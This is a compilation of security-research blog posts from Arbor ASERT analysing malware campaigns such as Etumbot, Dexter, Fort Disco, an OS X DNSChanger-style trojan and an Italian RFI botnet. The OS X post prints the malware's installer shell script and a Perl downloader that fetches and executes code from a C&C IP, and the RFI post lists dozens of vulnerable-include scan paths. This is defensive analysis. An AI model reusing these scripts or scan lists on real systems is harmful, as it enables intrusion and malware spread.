Illuminating The Etumbot APT Backdoor

By: Arbor Networks -

The Arbor Security Engineering Response Team (ASERT) has released a research paper concerning the Etumbot malware.

Etumbot is a backdoor used in targeted attacks since at least March 2011. Indicators suggest that Etumbot is associated with the Numbered Panda group, also known as IXEHSE, DynCalc, and APT12.  Although previous research has covered related malware, little has been publicly discussed regarding Etumbot’s capabilities.

Indicators suggest that the Etumbot dropper is delivered via spear phishing and is contained inside an archive file intended to be of interest to the target. The attackers use the Unicode Right to Left Override technique and document icons to disguise malicious executable content as document files. Once the dropper is executed, the backdoor is activated and a distraction file of interest to the target is opened for viewing.  ASERT has observed several Etumbot samples using distraction documents involving Taiwanese and Japanese topics of interest, and has also observed recent development activity which indicates that attack campaigns are ongoing.

Once installed, the backdoor connects to it’s Command & Control server and receives an encryption key. RC4 encryption, along with HTTP transactions intended to blend in with typical traffic are used for backdoor communications. Etumbot’s core functionality allows for the execution of commands and the capability to upload and download files.

Attackers attempt to obfuscate the malware by using a technique known as “byte strings”, also known as “string stacking”. Through the use of ASERT tools, these byte strings are deobfuscated and revealed herein.

A timeline containing distraction documents along with backdoor and dropper indicators to include MD5 hashes, Command & Control server information, file system and process artifacts are included herein. Some use of the HTran connection bouncer has been observed, indicating that selected C&C’s were simply compromised sites used to relay traffic elsewhere.

It is our aim to assist incident response and security teams and to provide meaningful insight into this threat.

Download the full report: ASERT Threat Intelligence Brief 2014-07: Illuminating the Etumbot APT Backdoor

Into the Light of Day: Uncovering Ongoing and Historical Point of Sale Malware and Attack Campaigns

By: cwilson -

Point of Sale systems that process debit and credit cards are still being attacked with an increasing variety of malware. Over the last several years PoS attack campaigns have evolved from opportunistic attacks involving crude theft of card data with no centralized Command & Control, through memory scraping PoS botnets with centralized C&C and most recently to highly targeted attacks that require a substantial amount of lateral movement and custom malware created to blend in with the target organization.

While contemporary PoS attackers are still successful in using older tools and methodologies that continue to bring results due to poor security, the more ambitious threat actors have moved rapidly, penetrating organizational defenses with targeted attack campaigns. Considering the substantial compromise lifespans within organizations that have active security teams and managed infrastructure, indicators shared herein will be useful to detect active as well as historical compromise.

Organizations of all sizes are encouraged to seriously consider a significant security review of any PoS deployment infrastructure to detect existing compromises as well as to strengthen defenses against an adversary that continues to proliferate and expand attack capabilities.

In addition to recent publications discussing Dexter and Project Hook malware activity, Arbor ASERT is currently tracking other PoS malware to include Alina, Chewbacca, Vskimmer, JackPoS and other less popular malware such as variants of POSCardStealer and others. Attack tactics shall also be explored through analysis of an attackers toolkit.

The longevity and extent of attack campaigns is a serious concern. In organizations with security teams and well managed network infrastructure, point of sale compromises have proliferated for months prior to detection. If attackers are able to launch long-running campaigns in such enterprise retail environments, one can conclude that many other organizations with less mature network and infrastructure management are also at serious risk. A sample of high-profile incident timelines, showing the date of the initial compromise, compromise timespan and compromise scope (number stores in this context) is included to highlight this point.

Download the full report: ASERT Threat Intelligence Brief 2014-06 Uncovering PoS Malware and Attack Campaigns

ASERT Threat Intelligence would like to thank fellow ASERT team members Dave Loftus, Alison Goodrich, Kirk Soluk and Matt Bing and also wishes to thank David Dunn of FIS Global and the Shadowserver Foundation for providing additional information.

Happy Holidays: Point of Sale Malware Campaigns Targeting Credit and Debit Cards

By: cwilson -

Inside Recent Point-of-Sale Malware Campaign Activities

Curt Wilson, Dave Loftus, Matt Bing

An active Point of Sale (PoS) compromise campaign designed to steal credit and debit card data using the Dexter and Project Hook malware has been detected. Indicators of compromise will be provided for mitigation and detection purposes. Prior to the publication of this Threat Intelligence document (embedded at the end of this post), members of the FS-ISAC, major Credit Card vendors and law enforcement were notified.

It appears that there are at least three distinct versions of Dexter:

  1. Stardust (looks to be an older version, perhaps version 1)
  2. Millenium (note spelling)
  3. Revelation (two observed malware samples; has the capability to use FTP to exfiltrate data)

In early November 2013, ASERT researchers discovered two servers hosting Dexter and other POS malware to include Project Hook.  The Dexter campaign looks more active, especially in the Eastern Hemisphere and therefore shall be the main focus herein. Dexter, first documented by Seculert in December 2012, is a Windows-based malware used to steal credit card data from PoS systems. The exact method of compromise is not currently known, however PoS systems suffer from the same security challenges that any other Windows-based deployment does. Network and host-based vulnerabilities (such as default or weak credentials accessible over Remote Desktop and open wireless networks that include a PoS machine), misuse, social engineering and physical access are likely candidates for infection. Additionally, potential brittleness and obvious criticality of PoS systems may be a factor in the reportedly slow patch deployment process on PoS machines, which increases risk. Smaller businesses are likely an easier target due to reduced security. While the attackers may receive less card data from smaller retailers, infections may be more numerous and last longer due to the lack of security reporting and security staff in such environments.

Figure 1: Dexter (Purple) and Project Hook (Orange) infections in the Eastern Hemisphere

Dexter and Project Hook infections in the eastern hemisphere

Figure 2: Dexter (Purple) and Project Hook (Orange) infections in the western hemisphere

Screen Shot 2013-12-03 at 1.22.00 AM

For the full document to include a list of various compromise indicators and information about the back-end infrastructure, please download the full public report –

Dexter and Project Hook Break the Bank

 

Fort Disco Bruteforce Campaign

By: Matthew Bing -

In recent months, several researchers have highlighted an uptick in bruteforce password guessing attacks targeting blogging and content management systems. Arbor ASERT has been tracking a campaign we are calling Fort Disco that began in late May 2013 and is continuing. We’ve identified six related command-and-control (C&C) sites that control a botnet of over 25,000 infected Windows machines. To date, over 6,000 Joomla, WordPress, and Datalife Engine installations have been the victims of password guessing.

Background

Understanding an attack campaign by only analyzing a malware executable file is a Sisyphean task. The malware alone can be picked apart by disassemblers, poked and prodded in a sandbox, but by itself offers no clues into the size, scope, motivation, and impact of the attack campaign. It’s much like a historian finding a discarded weapon on an ancient battlefield. Several things can be inferred, but painting a complete picture is difficult.

Researchers have several techniques at their disposal to gauge the size of a botnet. They can sinkhole discarded domains or monitor traffic to live attack sites to observe infected hosts checking in to a C&C site. In rare instances, the controller of a botnet may inadvertently leave clues publicly accessible for anyone to observe.

ftdisco

The controller of the campaign we call Fort Disco, named after one of the strings found in the PE metadata field, inadvertently left publicly accessible log files that lay out a complete picture of the campaign. There are six C&C sites that we believe are related. The sites either share a subdomain or are co-hosted with each other, and have similar structures.

Windows Malware

There are at least four variants of the Windows malware related to the Fort Disco campaign. A newly infected machine registers with the C&C site hardcoded into the malware:

> POST /cmd.php HTTP/1.0
>
> status=0

The malware then checks in to receive commands:

> GET /cmd.php HTTP/1.0
< 1
< 30
< http://[xxx]/10823.txt
< qazxsw
< 480

The command structure can vary, but the important commands are the third and fourth lines. The third line is a URL of a list of sites to attack. We’ve observed the target list being anywhere from 5,000 to 10,000 sites at a time. The C&C tends to give out the same list to multiple infections.

The fourth line is the password to use, and in some cases can be a URL to a password list. What’s particularly interesting about this bruteforce list is that it supports the dynamic values {domain} and {zone}. These values are replaced with the targets domain name and top-level zone, respectively. For instance, if the malware were targeting a blog at www.example.com and was configured to use “{domain}” as a password, the malware would attempt logging in with the password “example”. We’ve observed the password lists being used anywhere from 150 to 1,000 entries.

The malware has a URL of usernames hardcoded. The list is small, anywhere from one to five, and usually consists of “admin” or “administrator”. The login names also support {domain} values.

The malware will attempt to login to the target list with combinations of the supplied usernames and passwords. Successful username/password combinations are reported back to the C&C by posting to the file /bruteres.php. Results are appended to a text file publicly accessible via the web.

dir

It’s unclear exactly how the malware gets installed. We were able to find reference to the malware’s original filename (maykl_lyuis_bolshaya_igra_na_ponizhenie.exe) that referred to Michael Lewis’ book “The Big Short: Inside The Doomsday Machine” in Russian with an executable attachment. Another filename, proxycap_crack.exe, refers to a crack for the ProxyCap program. It’s unclear if victims were enticed to run these files, and if so, if that is the only means of infection. The C&C sites did not offer additional clues as to the infection mechanism.

cnc

 

Activity to the C&C sites continues. The above chart from Umbrella Security Graph’s passive DNS data show regular and continuing requests for this particular C&C domain name.

The log files found on the C&C sites included the IP addresses of victims. Some level of skepticism is required, since we are analyzing data that could have been altered by the attacker. We found 25,611 unique IP addresses connecting to the six C&C sites. Mitigating factors such as double-counting infections behind a NAT, and infected machines changing IP addresses may affect the final tally.

The top three countries with infections are the Philippines, Peru, and Mexico. Interestingly, it seems the United States and Western Europe are underrepresented. For an interactive map showing infected clients, click here.

Compromised Sites

Continuing to analyze the logs recovered from the C&C, we were able to compile a list of usernames and passwords for 6,127 sites.  Only three types of platforms were targeted: Joomla (/administrator/index.php), WordPress (/wp-login.php), and Datalife Engine (/admin.php).


blogs

The attacker chooses the sites to attack, which based on the top ten top-level domains where usernames and passwords are listed, appear to favor Russia:

Top-Level Domain Number
RU 2582
COM 1601
UA 348
NET 329
ORG 254
INFO 110
KZ 99
US 84
BY 76
xn--p1ai 65

The top ten passwords for these sites seem to indicate that these are targets of opportunity as these passwords are the “weakest of the weak”.

Password Number
admin 893
123456 588
123123 371
12345 360
{domain} 248
pass 218
123456789 171
1234 150
abc123 136
123321 131

 

With the compromised credentials, the commander of the botnet also installed a variant of the “FilesMan” PHP backdoor on to 788 of the sites. This password-protected backdoor allows the attacker to browse the filesystem, upload or download files, and execute commands.

The ultimate intent of the campaign remains unclear. On several compromised sites we found two tools:

• A simple PHP-based redirector that sends browsers running Windows with either “MSIE”, “Firefox”, or “Opera” in the User-Agent to a website through several more layers of redirection ultimately landing on a Styx exploit kit.
• A WordPress plugin and supporting library to import posts from a Tumblr blog.

We were not able to find any evidence that the tools were actually used, but based on their nature, we can speculate that the intent of the attacker is to serve exploit kits on these compromised sites.

Attribution

There are several clues that lead us to believe the owner is based in a post-Soviet state:

• The majority of the sites targeted are in Russia or the Ukraine.
• All of the C&C sites are hosted in Russia or the Ukraine.
• A Russian error string was found on several C&C sites. “Не могу подключиться к базе данных!”, which translates to “Unable to connect to database!”
• Although this appears to be the default, the character set of the FilesMan backdoor is set to “Windows-1251”, or the Cyrillic code page.
• The Datalife Engine platform appears to be popular in Russia.

Conclusion

Beginning with the Brobot attacks in early 2013, we’ve seen attackers focusing on targeting blogs and content management systems. This marks a tactical change in exploiting weak passwords and out-of-date software on popular platforms.  By uploading a PHP shell to compromised sites, an attacker can easily issue commands to thousands of compromised sites in seconds.

Blogs and CMSs tend to be hosted in data centers with immense network bandwidth. Compromising multiple sites gives the attacker access to their combined bandwidth, much more powerful than a similarly sized botnet of home computers with limited network access by comparison. While we have no evidence the Fort Disco campaign is related to Brobot or denial-of-service activity, we’ve experienced the threat that a large blog botnet can deliver.

Related MD5 Hashes

722a1809bd4fd75743083f3577e1e6a4
750708867e9ff30c6b706b7f86eb67b5
976f77d6546eb641950ef49a943449f1
062dae6ee87999552eae4bb37cdec5d4
7931709fd9b84bbb1775afa2f9dff13a
9b8b185ce66b6887cc19149258ba1d1b

Arbor Networks at Virus Bulletin 2011

By: jedwards -

Arbor’s ASERT team has a paper at this year’s Virus Bulletin conference in Barcelona, Spain. The paper, by Arbor’s Jeff Edwards and Jose Nazario, is titled A survey of Chinese DDoS malware and is based on some of the detailed analysis we did as part of the development of the ATLAS intelligence feed or AIF. Our malware stream contains a lot of DDoS bots, many from China, one of the more interesting ecosystems of malware development.

The abstract follows:

This paper surveys the diverse landscape of Trojan horse families populating a specific niche in the overall malware ecosystem: botnets that primarily serve as Distributed Denial of Service (DDoS) attack agents and which are believed to be of Chinese origin and/or to be primarily controlled from Chinese IP space.

Approximately two dozen distinct malware families will be described and documented, including the Rincux, NetBot Attacker, IMDDOS, Darkshell and YoyoDDoS families. These families will be characterized in terms of their command and control (CnC) protocols, DDoS attack capabilities, general code architecture, organization of their CnC infrastructure, and preferred targets.

Findings regarding the evolution and sharing/cross-pollination of malcode, as well as the build/release frequency of new versions will be presented. An approximate taxonomy of this particular space of malware will be proposed. The bulk malware analysis infrastructure that was used to obtain these findings will also be briefly described.

The paper is quite in-depth and contains a lot of technical details not covered in the talk, so be sure to refer to the paper if the talk is at all interesting.

Malicious Google AppEngine Used as a CnC

By: Jose -

Over the weekend our zoo found a malware sample that revealed a malicious Google AppEngine application. The app in question is being used to feed URLs to the zombies for them to download. We got the malware via sample sharing, and its original location and infection information is absent. The malware details are below:

MD5: 2143a7b9a9de6ea26987ed8ece29d2c6
SHA1: 30f6befc76e4e269e5aa9c01c735d55d7ca4099a
File type: application/x-ms-dos-executable
File size: 65024 bytes

It’s a simple HTTP engine and downloader, packed with UPX. The C&C is visible in the unpacked sample:

http://xiaoiboxip.appspot.com/[OMITTED]?hostname=

&&systemcpoy=
&&userName=

Where [Omitted] refers to a four letter explicative (this is a family friendly blog, folks!).

This was bound to happen, after all, in an open environment like this where people’s abilities are limited by their intentions. The C&C appears to manage infections on the basis of the computer hostname sent in the request; a unique hostname yields the malcode URL to update:

<br>http://XX.XX.76.85/aa.exe</br>

In this case aa.exe is a PCClient backdoor to the infected PCs. When you come back, at this time you just get the word “cmd”. It’s unclear to be what additional commands the C&C can issue to clients.

A quick analysis of the original malware doesn’t reveal any additional functionality, just the downloader bits. (See below) Google’s been contacted for the AppEngine to be taken down, and the site hosting the second stage malware has been contacted for takedown, as well.

UPDATE Google has confirmed the malicious AppEngine is now down.

UPDATE 2 Actually, looking at the sample reveals that it talks to a host in China using what at first blush appears to be a Grey Pigeon protocol.

UPDATE 3 Found another URL the app used, but i’m not sure what it was used for:

http://xiaoiboxip.appspot.com/getip?speed=100


The google cache of the results suggest it reads something like “Today visited 42 times this month, visited 587 times.” It’s unclear if that’s the size of the botnet or what.

Things in 3FN

By: Jose -

I think by this time folks know about the FTC action against 3FN (Triple Fiber Network). Here’s some of the stuff we had tracked there over the years.

3fn_activity_timeline.png

Don’t expect spam to drop to record lows any time soon, but … well done by the FTC.

New OS X Malcode: Not Just a DNSChanger

By: Jose -

Seems that Apple’s OS X has been taking a minor beating in the malcode front lately, as noted in the blog post New Trojans Strike OS X from CA. I got a copy of it last night and had a look, I wanted to see what the OS X malcode community was up to. The answer is both nothing much (it’s like we stepped back to 1999) and some new stuff (new approaches not yet seen in the OS X world, but old hat on Windows).

I became aware of the malcode through this URL shared in a ShadowServer link report:

http://online-channels.net/[REMOVED]/spam.txt

which yields the message “LOL look what the kid does to himself >> http://online-channels.net/[REMOVED]/random/1696/0/ :P :| !”, which will get spammed out in some message layer. About that hostname and IP, it’s located in the Netherlands (abuse contact has been made, we’ll see about takedown). It’s User-agent aware and delivers a Mac executable for folks on OS X and a Windows EXE for other folks.

online-channels.net A INET 89.248.172.213
AS      | IP               | AS Name
29073   | 89.248.172.213   | ECATEL-AS AS29073, Ecatel Network

If you visit the website you see something like this that leads to a “install this codec” response.

Jahlav_A_download.png

I’m sure you can see why I was suspicious: running this on an OS X system produces a fake Windows XP dialogue box. So I downloaded it and had a look. It’s an OS X DMG file named “cold-live7000.dmg”.

MD5(eaac894f299d15e75f48d99e4d9b254f)  cold-live7000.dmg

The OS X version of this file has very poor AV detection according to VirusTotal. The Windows EXE (MD5 = 042d747ac1494035fa4e26845aebfddc) has 7/32 detected in VirusTotal, using names like “TR/DNSChanger.hkx”, “Win32:FaDrop”, “TrojanDropper:Win32/Alureon.gen!B”, “a variant of Win32/Kryptik.BT”, and “Mal/BadNSIS”. It contacts a different host:

AS      | IP               | AS Name
29073   | 94.102.60.56     | ECATEL-AS AS29073, Ecatel Network

Right next door to the OS X server (see below).

When you mount it under OS X you get a volume named “install.pkg”. For those of you not used to OS X, install.pkg is a typical name for an installer (.pkg is common in OS X). Nothing too up-and-up yet! Let’s start digging in:

o:/Volumes/install.pkg/install.pkg/Contents jose$ ls -lrt
total 96
drwxr-xr-x   8 jose  jose    272 Nov 15 12:35 Resources
-rw-r--r--   1 jose  jose      9 Nov 15 12:35 PkgInfo
-rw-r--r--   1 jose  jose   3277 Nov 15 12:35 Archive.pax.gz
-rw-r--r--   1 jose  jose  35617 Nov 15 12:35 Archive.bom
-rw-r--r--   1 jose  jose   1329 Nov 15 12:35 Info.plist

So far this looks … well, interesting. Let’s first dig into the Resources subdirectory, that usually has the very intriguing bits:

o:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ ls -lrt
total 48
-rwxr-xr-x   1 jose  jose  8027 Oct 28 10:43 License
-rwxr-xr-x   1 jose  jose  2189 Nov 15 12:35 preupgrade
-rwxr-xr-x   1 jose  jose  2189 Nov 15 12:35 preinstall
-rw-r--r--   1 jose  jose    17 Nov 15 12:35 package_version
drwxr-xr-x   3 jose  jose   102 Nov 15 12:35 en.lproj
-rw-r--r--   1 jose  jose   545 Nov 15 12:35 BundleVersions.plist

The files “preupgrade” and “preinstall” do not differ, they’re shell scripts:

o:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ less
preinstall
#!/bin/sh
if [ $# != 1 ]; then type=0; else type=1; fi && tail -35 $0 | uudecode -o
/dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7000/' | sed
's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
begin 777 withlove
M159)3#TB87!P;&5M86,B"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6&ES=#U@8W)O;G1A8B`M;'QG

(Truncated) If we UUdecode that block (withlove) we get another script:

o:/Volumes/inspkg/install.pkg/Contents/Resources jose$ uudecode -o
/dev/stdout /tmp/withlove.uue
EVIL="applemac"
path="/Library/Internet Plug-Ins"
exist=`crontab -l|grep $EVIL`
if [ "$exist" == "" ]; then
     echo/5 * * * "$path/$EVIL" 1>/dev/null 2>&1" > cron.inst
     crontab cron.inst
     rm cron.inst
fi
#
tail -21 $0 | uudecode -o /d7777/bsd/' | sed 's/typeofrun/gnu/' | perl &&
exit
begin 666 jah
M(R$O=7-R+V)7)L"G5S92!)3SHZ4V]C:V5T.PIM>2`D:7`](CDT+C$P
M,BXV,"XQ,#8B+"1A;G-W97(](B(["FUY("1R=6YT>7!E/71Y<&5O9G);CL*
M"G-U8B!T<@/2!S:&EF=#L*"21S=')I;F<@
M/7X@<

(Truncated again) The first part of that will install a crontab entry (scheduled job) to look for new malcode (as the installed user) every five minutes via the script it’s about to install. The UUencoded archive “jah” is a Perl script:

:/Volumes/install.pkg/install.pkg/Contents/Resources jose$ cat
/tmp/jah.uue | uudecode -v/stdout | sed 's/7777/7000/' | sed
's/typeofrun//'
#!/usr/bin/perl
usmy $ip="94.102.60.106",$answer="";
my $runtype=;
#
sub trim($)
{
         my $string = shift;
         $string =~ s/r//;
         $s =~ s/n//;
         return $string;
}
#
my $socket=IO::Socket::INET->new(PeerAddr=>"$ip",PeerPort=>"8roto=>"tcp")
or return;
print $socket "Gtor.pl HTTP/1.0rnUser-Agent: ".trim(`uname
-p`).";$runtype;".trim(`hostname`).";rnrn";
#
while(<$socket>){ $answer.=$_;}
close($socket);
#
my $data=substr($wer,index($answer,"rnrn")+4);
if($answer=~/Time: (.*)rn/)
{
     my $cpos=0,@pos=split(/ /,$1);foreach(@pos)
     {
         my $file="/tmp/".$_;
		 #
         open(FILE,">".$file);
         print FILE sr($data,$cpos,$_);
         close(FILE);
		 #
         chmod 0755, $file;
         system($file);
		 #
         os+=$_;
     }
}

And with this your box is downloading various malcode, they know what you’re running, and further exploits are possible.

Earlier today the malcode phoned home to this HTTP server in AS29073 in the Netherlands:

AS29073   | 94.12.60.106    | ECATEL-AS AS29073, Ecatel Network

Now that same server has moved to the UK:

AS4589    | 94.12.60.106     | EASYNET Easynet Group Plc

It’s no longer responding for me, it’s possible that Easynet took care of it.

UPDATE
I’ve been editing this post for the past hour or so adding new details as they come in. In addition to the single Windows sample I posted above, a handful more related samples have shown up in our database in the past week:

2008-11-24      KuLightCadecPock3373.exe
2008-11-24      http://xxxlexelink.com/[REMOVED]/pathexe.php?id=3373&na...
2008-11-23      http://cold-live.net/[REMOVED]/Xvid.Codec.Upda...
2008-11-22      http://mamasplanet.com/[REMOVED]/samplevideo.php
2008-11-21      6c9d833b1914341e9facea439ef7...
2008-11-20      keygen_Malware_Defender_1_0_1_3552.exe
2008-11-19      http://www.beautypornpost.com/[REMOVED]/movie...
2008-11-18      http://www.babespornmovies.com/[REMOVED]/fr...
2008-11-18      http://tasty-moms.com/[REMOVED]/video.php
2008-11-18      http://bitchysexymoms.com/[REMOVED]/mov.php

These samples connect to 94.102.60.56, but one of them connects to 78.157.142.108, located in UltraNet:

AS      | IP               | AS Name
35057   | 78.157.142.108   | ULTRANET-AS UltraNet Ltd.

That ISP is appearantly in Latvia (.lv) … The Windows EXEs also POST to a script on the web server to announce their infections and get new binaries.

What’s even more interesting is the degree of investment this team has made in OS X malcode. They’ll be making new infections, it seems, for some time to come with that configurable loader.

Inside an RFI Botnet

By: Jose -

It all began innocently enough; I have been analyzing Apache logs for a while now, and when I spotted an RFI bot that was named “ddos.txt”, you know I had to look. After downloading it and analyzing it, I joined the channel with a copy of Bladerunner and started watching. The net’s been pretty quiet but here’s a few messages that came across, lately:

Tue Nov 11 00:11:14 2008
 @scan index.php?rage= index.php?rage=
...
Thu Nov 13 07:12:37 2008
 !scan /encapscms_PATH/core/core.php?root= "encapscms 0.3.6" "encapscms 0.3.6"
Thu Nov 13 07:12:37 2008
 !scan /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path= "com_thopper"
Thu Nov 13 07:12:37 2008
 !scan /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path= "com_pccookbook"
Thu Nov 13 07:12:37 2008
 !scan /admin/business_inc/saveserver.php?thisdir= "saveserver.php"
Thu Nov 13 07:12:37 2008
 !scan /admin/classes/TplLoad.php?full_path_to_public_program= "TplLoad.php"
Thu Nov 13 07:12:37 2008
 !scan /PhpLinkExchange/bits_listings.php?svr_rootP= /PhpLinkExchange/
Thu Nov 13 07:12:37 2008
 !scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= /PNphpBB2/
Thu Nov 13 07:12:40 2008
 !scan /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path= "com_mambowiki"
Thu Nov 13 07:12:41 2008
 !scan /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path= "com_mambots"
Thu Nov 13 07:12:43 2008
 !scan /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path= "com_mambatstaff"
...
Fri Nov 14 12:27:15 2008  4,12Ciao a tutti
Fri Nov 14 12:27:17 2008  4,12Arrivederci alla prox
...
Mon Nov 17 16:35:05 2008  hello
Mon Nov 17 18:54:45 2008  hello

Looks like Italian language hackers simply growing a botnet. No DDoS attacks launched, so far.

The channel topic instructs members (aka bots) to download three files. The first is one we’ll call “dork”. It’s basically a config file for an RFI scanner in Perl that takes a massive file (over 4300 scan commands) to spread the botnet. There’s simply no shortage of RFI vulnerabilities out there in various projects.

!scan /tellmatic/include/libchart-1.1/libchart.php?tm_includepath= "Tellmatic 1.0.7.1" "Tellmatic 1.0.7.1"
!scan esupport/admin/autoclose.php?subd= "Powered By Kayako eSupport" "Powered By Kayako eSupport"
!scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= "PHP-NUKE" asia "PHP-NUKE" asia
!scan /index.php?skin_file= "powered by Mp3 ToolBox 1.0 beta 5" "powered by Mp3 ToolBox 1.0 beta 5"
!scan /skin/zero_vote/ask_password.php?dir= "zeroboard" cz "zeroboard" cz
!scan /config.inc.php?path_escape= "XZero"
!scan mambots/content/multithumb/multithumb.php?mosConfig_absolute_path= "/mambots/content/" de "/mambots/content/" de
!scan ?mosConfig_absolute_path= "Joomla! is Free Software released under the GNU/GPL License"
!scan /tools/send_reminders.php?noSet=0&includedir= WebCalendar
!scan phprojekt/lib/lib.inc.php?path_pre= /phprojekt/
!scan phprojekt/lib/lib.inc.php?path_pre= copyright ?2000-2005 Albrecht Guenther
...

The second two URLs point to c57 and c99 PHP shells.

These all work with a Perl script which we’ll call “dork.pl”. Basically it works as such:

  • Use search engines to find vulnerable system: Google, AllTheWeb, GigaBlast, AOL, Yahoo, MSN, ASK, FireBall
  • Try and exploit the box:
    • First try a PHP ID script; if that works move on and mail the author that it worked
    • Next try and load a PHP shell on the box; if that works, mail and move on to the next step
    • Now try and get the first stage “spreader” on the box; again, mail and move on if successful
    • Finally try and get the second stage “spreader” on the box, mail if successful
  • Once the box is exploited, all of the scripts are on the box: a PHP bot, a Perl bot (which is also an IRC bot, DDoS tool, and exploier), and PHP shells.

Quite the sloppy set up, very much slapped together. The code could use a good refactoring, as well, it has a lot of cut and paste going on. Crude but effective.

Once the PHP bot, in this case “ddos.txt”, drops and executes via the RFI exploit, it will drop another Perl script on the box, this one is a connect back door. It has the payload Base64 encoded in the PHP, so it simply opens a file in /tmp and drops it in there.

In this case, the bots connect to IndoIRC and maybe irc.irchighway.net; Neither network is terribly well known for its security practices and seem to tolerate or welcome botnet activities.

The great proliferation of RFI attacks, and the ease with which they can be tested and exploited with “frameworks” such as “dork.pl” should give you great pause. We often see Phishing sites set up on these boxes, and sometimes other nefarious activities hosted there, as well. When folks have hundreds of vulnerabilities and thousands of boxes to easily test them again, they’ll strike it rich quickly. Death by a thousand cuts, and now you can see how it happens.

“Baiting” Web Surfers

By: Sunil James -

In case you haven’t already heard, a variety of websites, including those with content about “fish and tackle,” have been identified as having been compromised so that when people browser to the site, they’re then re-directed to an alternate location, where the host is then compromised so that attackers could then steal potentially sensitive data, and employ the host itself to launch future attacks.

Fish and tackle….wow.

What I find particularly interesting about this is not the technical aspects of how exploitation occurs, but rather the measured approach employed by one or more individuals to execute such an attack. As with any product acquisition, the first step is for the buyer to identify a set of vendors with the desired product. In this case, the attacker acquired an exploitation framework that employed rigorous software engineering processes and was distributed and marketed in a fashion similar to mainstream software. By that, I mean that the framework purveyor(s) developed marketing collateral, offered tiered product and service pricing, and offered one year of support. From there, the attacker folded the tool into the pre-built network of compromised hosts and waited for users to be compromised; all the while being provided with up-to-date statistics about who was being exploited, what country they were based in, and what exploits were most effective.

Rather than employ web servers hosting illegitimate content, the attackers employed primarily Italian web servers hosting fairly benign content, including: tourism, hotels, automotive, movies and music. August in Italy is notorious for effectively being one long holiday. That makes these web servers are ideal targets, as a multitude of vacationers (not just Italian or other Europeans) are visiting these sites and seeking information about how to spend the holiday.

This methodical approach is consistent with an unnerving trend of attackers employing re-usable systems for future financial gain (see Danny’s “Botconomics” post to learn all about this). In the short-term, the attackers will likely employ the stolen financial information to build a larger network of compromised hosts. The attackers themselves can subsequently utilize that network, or they can seek some sort of “ROI” by “leasing” out the network to other attackers. Either way, this case further emphasizes the importance of security vendors and service providers doing as much as possible to provide Internet users with as safe a browsing experience as possible. While hosts should certainly be patched as quickly as possible, network security vendors (like us) are working with service providers who own the “pipes,” thereby allowing us to attack this problem from a different, hopefully more successful, perspective.

Go Back In Time →